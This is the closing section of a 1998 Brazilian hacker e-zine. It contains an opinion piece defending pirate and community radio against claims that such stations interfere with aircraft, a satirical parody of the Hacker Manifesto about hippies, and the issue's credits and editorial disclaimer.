    No início do ano, estourou como bomba no jornal "Estado de São Paulo" que o site http://www.pt.org.br/radio/radiocom.htm tinha uma cartilha, preparada com o intuito de ajudar quem quer que quisesse instalar sua rádio ou tv pirata ou comunitária. Todo mundo já ouviu falar de rádio pirata, tem ate' musica e o slogan: "radio pirata e' crime". Inclusive ate' sao feitas simulacoes de problemas ocasionados por radios desse genero, como interferencia em avioes, ambulancias, etc.. coisa que e' propaganda enganosa. Ninguem porem entende alguns pontos: sera' que instalar sua propria radio e' coisa de maluco que quer anarquizar e detonar com ambulancias ou avioes? Vamos colocar entao alguns pontos nos iis, comecando pela ideia que isso interfere nos avioes. Foi uma hipotese que surgiu, quando caiu o aviao da TAM e o dos Mamonas. Se for pesquisar os jornais da epoca, pode-se encontrar num deles (no Estado de Sao Paulo 01/11/96, por exemplo):-----------------------------------------
    Especialistas discutem a causa do acidente

    A mais provável, dizem, é a reversão da turbina direita, mas há quem fale em falha nos flaps de uma das asas e em eventual interferência de sinais eletrônicos

    [..]

    A tese de uma influência eletrônica nos equipamentos mecânicos do Fokker, contudo, é vista com desconfiança pelos peritos. O professor de microondas da Escola Politécnica da Universidade de São Paulo (USP) José Kleber da Cunha Pinto disse que os aviões estão sujeitos a interferências eletromagnéticas. "Mas elas não acionam equipamentos", afirmou. "Turbinas e trens de pouso são ligados fisicamente, por meio de cabos."

    Freqüências

    Pinto disse que ondas eletromagnéticas só interferem em aparelhos de navegação, altímetros e na comunicação com a torre. O professor não acredita que uma rádio pirata teria alterado a leitura de equipamentos. "Elas operam em FM, ou 110 mhz, mas a comunicação dentro do avião é de acima de 150 mhz."

    O perito aposentado da área de investigações de acidentes do Serviço Regional de Aviação Civil (Serac) Roberto Peterka também não acredita na influência eletrônica. Ele descartou uma eventual falha do piloto e enumerou ainda 30 fatores importantes a serem investigados, como o comportamento dos flaps das asas - que auxiliam na frenagem do avião.

    [..]

    No ranking dos principais vilões eletrônicos, o primeiro lugar é ocupado por celulares. Por conta do efeito comprometedor de telefones e computadores, um estudo sobre o problema está sendo realizado pelo Departamento de Segurança da Varig. "Mas é muito pouco provável que esse tipo de interferência consiga acionar um mecanismo como o da reversão da turbina", afirmou Souza. O piloto observou que os aviões são homologados para voar com apenas um motor. "O problema deve ter sido muito sério"...

    -----------------------------------

    Porque as rádios são tão unânimes em condenar radios piratas, então? Sera' que e' porque 60% dos parlamentares brasileiros tem sua propria radio? Sera' que e' porque o radio atinge mais as camadas populares do que a televisao? Afinal, o sujeito pode trabalhar e ouvir radio. O espaco de propaganda no radio e' algo caro. Tendo sua propria radio, fica mais facil pro politico fazer sua campanha eleitoral. Aquele politico do predio que caiu nao tinha sua propria radio, tinha tambem sua televisao. E era TVEducativa, sabem porque? Porque quando voce compra o material pra transmitir ondas de TV voce precisa da programacao de alguma emissora, voce nao vai produzir material pra competir com uma Bandeirantes, Record ou Globo.

    So' que essas emissoras, por exemplo nao dao espaco para que sejam produzidos programas locais, como a TVEducativa da'. O mesmo acontece com essas radios que tocam material da Jovem Pan. Paga-se milhoes por uma "franquia" que permita ao carinha la' no sertao ouvir "Os sobrinhos do Ataíde". Pra ser mais exato, acho que e' um milhao de Reais por mes, dependendo do publico alvo. Rola também uma grana de propaganda bem alta, pra não falar do boato de que as rádios recebem grana das gravadoras para só tocar músicas de gente de sucesso. E tenta voce fazer sua própria rádio pelos métodos legais. Existe o boato que as concessões são feitas quase que a peso de ouro em propinas. Nao é fácil fazer sua própria rádio no Brasil. Tem que ter grana. Muita grana.

    E legal, que lance é esse de rádio comunitária? Antes de cair a nova legislação, permitindo isso, era algo que também era chamado de rádio pirata. Veja o caso de uma cidadezinha, de uns 3 mil habitantes. Não precisa de um transmissor grande. A rádio precisa de alguma coisa pra não ficar isolada do mundo, saber o que está passando, previsao do tempo, etc.. não tem recursos pra entrar legalmente e conseguir um alvará de "exploração comercial" da frequência de rádio . Pois, era isso que era proibido de existir. As pessoas que quisessem, da mesma forma que está se fazendo com web pages, ter seu próprio serviço de rádio difusão individual eram podadas no seu direito de exprimir sua voz. Ou fatura e paga imposto ou nada feito. Aliás, considerando as possibilidades, o Brasil tem um número reduzidíssimo de rádios para a extensão territorial.

    A legislação que permite agora, que pessoas sem interesse em ganho financeiro possam veicular sua voz para um publico amplo, não teve divulgação nos grandes jornais. Falou-se da lei de direito autoral, da nova lei regulamentando a pirataria de programas, mas não se falou da lei liberando as rádios não-comerciais. Tudo isso evidencia as grandes emissoras, tanto de rádio como televisão, querem continuar dominando e literalmente obrigando todo mundo a ouvir aquilo que para eles é notícia, aquilo que para eles é música. E pra quem não sabe, houve muita gente que perdeu equipamentos e foi presa, porque tinha uma rádio que atendia a interesses de uma pequena comunidade só porque estava "burlando a lei". Os parlamentares votaram essa legislação, vale a pena agora todo mundo se conscientizar que o espaço das ondas de rádio deve ser reclamado e tomado. A informação deve ser livre! Viva as ondas livres!

    The Conscience of a Hippie

    By Ur'Lord Pyro -K on Saterday, March 29th, 1995.Another one got beat up today, it's all over the village. "Hippie beat up for passing out flowers.", "Hippy beaten after saying peace to a biker". damn Hippies, they're all alike.

    But did you, in your clean clothes and 1990's techonobrain, ever take a look behind the yes of a hippie? Did you ever wonder what makes him stink, what put him in the shape he's in, what may have molded on him?

    I'm a hippie, enter my world.

    Mine is a world that begins at school. I'm dumber than most of the other kids, this stuff they teach us is just way too hard. damn smart people, they're all alike.

    I dropped out of jr.high or high school. I've listened to teachers explain for the hudredth time what a noun is, I still dont get it. "uh, like, uh, No Ms Mugliagutter, I didnt show my work, i like, um, did it in my head and stuff." damn teacher, cauth me cheating again, they're all alike.

    I made a discovery today. I found a bong and some pot. Wait a minute, this is cool. I can get high all I want, if I make a mistake, it's ok, because I'm high, not because I'm stupid,

                or braindead 
    or lazy
    or dont think the teachers likes me

    damn hippie, all he does is get high. I wish I were him.

    Then it happened... a door opened to a world... and my parents through me out. A plea is made, a refuge from the real world is sought, a commun is found

    "dude, this is the shit. this is were I belong..." I dont know anything here... even if I've been told it a hundred times, even if I listened to them intently, I dont know shit. Damn hippie, so incompetent that he can't tie his own shoes. They're all alike.

    You bet yer bong water we're all alike... we've been fed like babies on silver spoons by our our parents and never learned to fend for ourselves. The times they tried to teach us responsabilty we made our sisters do the work. We've been cominated by guilt-ridden souls, and beaten up for passing out flowers. The few that gaves us a chance quickly dropped us off in the middle of the desert.

    this is your world now. the world of 3 meals a day and a roof over your head. We exist in the dumpsters and back alleyways of your streets begging for food when we could just get jobs and support ourselves. We try to sell flowers, and you beat us up. We say "love each other" and you beat us up. We walk on the other side of the street to avoid you and you still beat us up.

    You work, buy homes, buy cars, buy food, and try and teach us how we can do the same thing, yet we just listen.

    yeah, like, um, I'm a hippie. My life is made up of searching for food in dumbsters, and finding a place to sleep where the man wont get down on me. My life is proving I'm dumber than you, something I'll never forgive you for.

    I'm a hippie, and this is my, uh, like, uh, man-i, manifesto. you may have beaten up this one, you may beat me up, you might beat us all up, i mean, like, we're all alike and junk.

    Créditos e Agradecimentos

    Ben Reilly agradece ao colega Derneval pela cópia de seu artigo na 2600.

    Agradecemos todos os que nos escreveram, colaboraram de forma direta ou indireta para a realização desse zine. Lembramos também as pessoas que freqüentam o Hack Hour e nos ajudam a fazer deste ciberespaço um lugar melhor. Valeu galera!!!

    Cyber Optik (cyberoptik@hackhour.com.br)
    Overall (overall@hackhour.com.br)

    Nota dos Editores:

    • Nós da HUB não incentivamos que você utilize de forma maliciosa, nenhuma das informações contidades nesta publicação. Todo o conteúdo desta eZine foi produzido/traduzido com a intenção de alertá-los dos perigos que todos podem estar correndo se os recursos de redes e telefonia que todos utilizamos diariamente não forem utilizados adequadamente.
    • Se vc utilizar estas informações para danificar ou prejudicar qualquer pessoa, máquina ou empresa, nós NÂO nos responsabilizamos por suas atitudes. Aliás, não nos responsabilizamos por suas atitudes independente de quais foram suas fontes de informações.
    • Antes de utilizar este conhecimento de forma maliciosa, lembre-se apenas de que existem leis internacionais rigorosas para previnir este tipo de atitude.
    • A HUB não se responsabiliza pelas opiniões e conceitos emitidos em textos assinados. Os textos assinados são de responsabilidade exclusiva de seu autor/tradutor.
    • O material produzido pela equipe da HUB não poderá ser reproduzido sem que os créditos do autor e edição apareçam anexados ao mesmo.
    • Todas as marcas registradas sobre nomes, produtos, equipamentos ou qualquer outra citada nesta edição pertencem à seus respectivos proprietários.

    Quarta-feira, 8 de Abril de 1998 18:12:07

  • ← previous
    next →
    loading
    sending ...
    New to Neperos ? Sign Up for free
    download Neperos App from Google Play
    install Neperos as PWA

    Let's discover also

    Recent Articles

    Recent Comments

    Neperos cookies
    This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

    By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

    By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
    OK
    REJECT